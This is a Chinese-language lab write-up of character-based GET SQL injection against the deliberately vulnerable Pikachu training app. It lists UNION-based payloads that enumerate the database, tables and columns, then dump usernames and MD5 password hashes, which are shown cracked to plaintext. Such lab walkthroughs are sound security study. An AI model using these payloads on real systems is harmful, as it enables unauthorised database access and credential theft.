Pikachu--字符型注入(get)

Pikachu--字符型注入(get)

提交方式是get提交,直接在浏览器地址栏里输入注入语句得出结果

判断注入类型

我们要输入数据库里面有的名字 比如vince

Pikachu--字符型注入(get)_第1张图片

输入1' and '1'='2  错误结果

Pikachu--字符型注入(get)_第2张图片

输入 1' and '1'='1 正确结果         判断为字符型注入

Pikachu--字符型注入(get)_第3张图片

判断字段数

输入vince' order by 1#   返回正确

Pikachu--字符型注入(get)_第4张图片

输入vince' order by 2#  返回正确

Pikachu--字符型注入(get)_第5张图片

输入 vince' order by 3#

Pikachu--字符型注入(get)_第6张图片

所以字段数为2

判断显位

Vince' union select 1,2#

Pikachu--字符型注入(get)_第7张图片

发现1和2的位置都可以正确回显,1,2地方使用联合注入。

查询当前数据库

1' union select 1,database() #   当前数据库  

Pikachu--字符型注入(get)_第8张图片

获取表名

1' union select 1,group_concat(table_name)from(information_schema.tables) where table_schema='pikachu' #

Pikachu--字符型注入(get)_第9张图片

获取列表

1' union select 1,group_concat(column_name) from (information_schema.columns) where table_name='users' #

Pikachu--字符型注入(get)_第10张图片
获取数据

1' union select username,password from users#

Pikachu--字符型注入(get)_第11张图片

your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e

解密为:123456

Pikachu--字符型注入(get)_第12张图片

your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd

解密为:000000

Pikachu--字符型注入(get)_第13张图片

your uid:test
your email is: e99a18c428cb38d5f260853678922e03

解密为:abc123

Pikachu--字符型注入(get)_第14张图片

你可能感兴趣的:(SQL注入,数据库,oracle)